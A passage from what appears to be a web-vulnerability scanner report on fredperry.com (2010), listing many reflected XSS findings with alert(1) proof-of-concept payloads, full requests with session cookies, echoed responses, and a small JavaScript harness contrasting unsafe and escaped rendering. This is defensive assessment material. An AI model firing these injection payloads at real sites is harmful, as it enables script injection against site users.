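    // UTF-16 code unit; surrogate halves are escaped individually, which is a
    // valid way to spell an astral character inside a JS string literal.
    const code = s.charCodeAt(i);
    out += code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  }
  return out;
}

// Vulnerable pattern: equivalent to what the responses in this section show.
function renderTrackerUnsafe(requestUri) {
  return 'pageTracker._trackPageview("' + requestUri + '");';
}

// Hardened pattern: same template, value encoded for the JS string context.
function renderTrackerSafe(requestUri) {
  return 'pageTracker._trackPageview("' + jsStringEscape(requestUri) + '");';
}

// Execute a rendered snippet the way a browser would, with alert and
// pageTracker stubbed. Returns what each stub observed and whether the
// snippet failed to parse (an unterminated string, for example).
function runSnippet(script) {
  const seen = { alertCalls: 0, trackedPath: undefined, syntaxError: false };
  const pageTracker = { _trackPageview(path) { seen.trackedPath = path; } };
  const alert = () => { seen.alertCalls += 1; };
  try {
    new Function('pageTracker', 'alert', script)(pageTracker, alert);
  } catch (err) {
    if (!(err instanceof SyntaxError)) throw err;
    seen.syntaxError = true;
  }
  return seen;
}

// Canary from finding 1.110, exactly as the scanner sent it (quotes unencoded).
const CANARY_URI = '/limited-edition/men/footwear/?9e0e7"-alert(1)-"38b1976be02=1';

// Render the same URI both ways and run each. With the unsafe render the
// string literal is closed early and "..." - alert(1) - "..." is evaluated:
// alert fires and the tracker receives NaN. With the escaped render the
// tracker receives the original URI and nothing else executes.
function demonstrate(uri = CANARY_URI) {
  return {
    unsafe: runSnippet(renderTrackerUnsafe(uri)),
    safe: runSnippet(renderTrackerSafe(uri)),
  };
}

console.log(JSON.stringify(demonstrate(), null, 2));
```

The harness only models the JavaScript side; it has no HTML parser, so the </script> breakout is covered by the escaper's treatment of angle brackets rather than demonstrated. Two retest points follow from it: a bare line feed in the unsafe render is a syntax error rather than a silent pass, so a retest that only looks for alert() would miss a partially fixed template; and the scanner sent the double quote raw in the request line, so confirm the path-segment variants from a real browser as well, since a client that sends %22 exercises a different path through the application than the one recorded here.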

1.111. http://www.fredperry.com/limited-edition/men/jackets/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/jackets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87423"-alert(1)-"78a5c0855dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition87423"-alert(1)-"78a5c0855dc/men/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=4nuf1et02e07oi73qvqof1qh46; expires=Tue, 09-Nov-2010 17:13:28 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition87423"-alert(1)-"78a5c0855dc/men/jackets/");
//]]>
...[SNIP]...

1.112. http://www.fredperry.com/limited-edition/men/jackets/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/jackets/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee837"-alert(1)-"f8707917c46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/menee837"-alert(1)-"f8707917c46/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=5c1cf8cj9pbs5m5honuqit50q1; expires=Tue, 09-Nov-2010 17:13:56 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/menee837"-alert(1)-"f8707917c46/jackets/");
//]]>
...[SNIP]...

1.113. http://www.fredperry.com/limited-edition/men/jackets/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/jackets/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94014"-alert(1)-"d16e6883150 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/jackets94014"-alert(1)-"d16e6883150/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=4edgddt3us8kdggun3pnup1cu7; expires=Tue, 09-Nov-2010 17:14:33 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/jackets94014"-alert(1)-"d16e6883150/");
//]]>
...[SNIP]...

1.114. http://www.fredperry.com/limited-edition/men/jackets/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/jackets/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91787"-alert(1)-"5d4b3174de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/jackets/?91787"-alert(1)-"5d4b3174de=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ipnrrfroenifcc68853hh96l57; expires=Tue, 09-Nov-2010 17:11:34 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/jackets/?91787"-alert(1)-"5d4b3174de=1");
//]]>
...[SNIP]...

1.115. http://www.fredperry.com/limited-edition/men/knitwear/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/knitwear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dddb"-alert(1)-"34b8e81cc19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition4dddb"-alert(1)-"34b8e81cc19/men/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=n9ra8r0sau1t0h6t9nemlua6p4; expires=Tue, 09-Nov-2010 17:13:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition4dddb"-alert(1)-"34b8e81cc19/men/knitwear/");
//]]>
...[SNIP]...

1.116. http://www.fredperry.com/limited-edition/men/knitwear/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/knitwear/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7881"-alert(1)-"0fee6082005 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/menf7881"-alert(1)-"0fee6082005/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=of96rkse531fjcp0dee2fp1jp2; expires=Tue, 09-Nov-2010 17:14:02 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/menf7881"-alert(1)-"0fee6082005/knitwear/");
//]]>
...[SNIP]...

1.117. http://www.fredperry.com/limited-edition/men/knitwear/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/knitwear/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6277"-alert(1)-"d5b0d20f61b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/knitweard6277"-alert(1)-"d5b0d20f61b/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=tf1c4q1115nglm7718ghr1ebl0; expires=Tue, 09-Nov-2010 17:14:26 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/knitweard6277"-alert(1)-"d5b0d20f61b/");
//]]>
...[SNIP]...

1.118. http://www.fredperry.com/limited-edition/men/knitwear/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/knitwear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 182cb"-alert(1)-"18aae9e5047 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/knitwear/?182cb"-alert(1)-"18aae9e5047=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:12:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=d4i4f76btfgd8nphpd8gg1kdc0; expires=Tue, 09-Nov-2010 17:12:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/knitwear/?182cb"-alert(1)-"18aae9e5047=1");
//]]>
...[SNIP]...

1.119. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/liberty-blank-canvas/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70f33"-alert(1)-"55941b02465 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition70f33"-alert(1)-"55941b02465/men/liberty-blank-canvas/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:09:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=bak51qld4c0iqbgdtpogctnhl1; expires=Tue, 09-Nov-2010 17:09:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition70f33"-alert(1)-"55941b02465/men/liberty-blank-canvas/");
//]]>
...[SNIP]...

1.120. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/liberty-blank-canvas/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 443a9"-alert(1)-"e720bf77e2a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men443a9"-alert(1)-"e720bf77e2a/liberty-blank-canvas/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=h813f9bc0t7s20s9plqkq52q26; expires=Tue, 09-Nov-2010 17:10:15 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men443a9"-alert(1)-"e720bf77e2a/liberty-blank-canvas/");
//]]>
...[SNIP]...

1.121. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/liberty-blank-canvas/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55b43"-alert(1)-"a143e97bf8f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/liberty-blank-canvas55b43"-alert(1)-"a143e97bf8f/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=tr5obeucie5eqkimd9lql3i1v1; expires=Tue, 09-Nov-2010 17:10:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/liberty-blank-canvas55b43"-alert(1)-"a143e97bf8f/");
//]]>
...[SNIP]...

1.122. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/liberty-blank-canvas/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec45f"-alert(1)-"932cb284aae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/liberty-blank-canvas/?ec45f"-alert(1)-"932cb284aae=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:09:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=n2lvemetp3uf61ntmcfdl2ese7; expires=Tue, 09-Nov-2010 17:09:09 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Liberty
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/liberty-blank-canvas/?ec45f"-alert(1)-"932cb284aae=1");
//]]>
...[SNIP]...

1.123. http://www.fredperry.com/limited-edition/men/new-styles/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/new-styles/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aafcd"-alert(1)-"ca9f7a6b3df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editionaafcd"-alert(1)-"ca9f7a6b3df/men/new-styles/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
